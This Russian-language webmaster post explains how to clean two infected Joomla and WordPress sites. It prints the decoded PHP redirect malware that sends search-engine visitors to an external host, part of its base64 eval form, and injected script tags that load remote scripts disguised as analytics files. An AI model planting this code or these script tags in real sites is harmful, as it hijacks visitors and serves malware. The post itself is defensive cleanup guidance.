Заражены два сайта. Один на Joomal 2.5, другой на WordPress. Оба сайта лежат на одном хостинг-аккаунте. Вредоносный скрипт внедрен во все php файлы по одному или несколько раз:
Расшифрованный он выглядит так:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){ header("Location: http://oeprfa.ddns.me.uk/"); exit(); } } } } }
В зашифрованном виде в php файлах так:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/...
Google Chrome при посещении сайта с внедренным скриптом показывает следующее сообщение: (k.human-e.net)
11 Антивирусов из 47 идентифицируют скрипт как вредоносный:
AntiVir PHP/Redirector.A
Avast PHP:Agent-CF [Trj]
BitDefender Trojan.Script.480780
Comodo TrojWare.PHP.Redirector.B
Emsisoft Trojan.Script.480780 (B)
F-Secure Trojan.Script.480780
GData Trojan.Script.480780
Ikarus Trojan.PHP.Redirector
Kaspersky HEUR:Trojan.Script.Generic , Backdoor.PHP.Pioneer.a
NANO-Antivirus Trojan.Html.Redirector.bgwkgg
nProtect Trojan.Script.480780
Как лечить? Нам необходимо удалить во всех файлах указанный скрипт, а это могут быть тысячи файлов.
1. Делаем резервную копию файлов.
2. Скачиваем файлы на локальный компьютер. (отключив антивирус)
3. С помощью программы @Text Replacer (бесплатная программа и полностью функциональна в незарегистрированной версии) выполняем поиск вредоносного кода в файлах и заменяем на пробел.
4. Удаляем с файла \wp-content\themes\название темы\footer.php следующий java script:
<scrіpt type="text/javascript" src="http://hot-searches.info/wp-includes/google-analytics.php"></script>
<scrіpt type="text/javascript" src="http://www.insead.dk/wp-content/uploads/jquery-update.php"></script>
<scrіpt type="text/javascript" src="http://k.human-e.net/wp-content/plugins/wp_googleapi/google-analytics.php"></script>
5. Удаляем с файла \wp-content\themes\название темы\header.php следующий java script:
<scrіpt type="text/javascript" src="http://k.human-e.net/wp-content/plugins/wp_googleapi/google-analytics.php"></script>
<scrіpt type="text/javascript" src="http://imamasim.com/modules/mod_modules/jquery-update.php"></script>
<scrіpt type="text/javascript" src="http://www.insead.dk/wp-content/uploads/jquery-update.php"></script>
<scrіpt type="text/javascript" src="http://hot-searches.info/wp-includes/google-analytics.php"></script>
(В анализе п.4. п.5. помогли "Инструменты для Веб мастеров" от Google)
6. Закачиваем файлы обратно на хостинг.
Удачной борьбы с вирусами!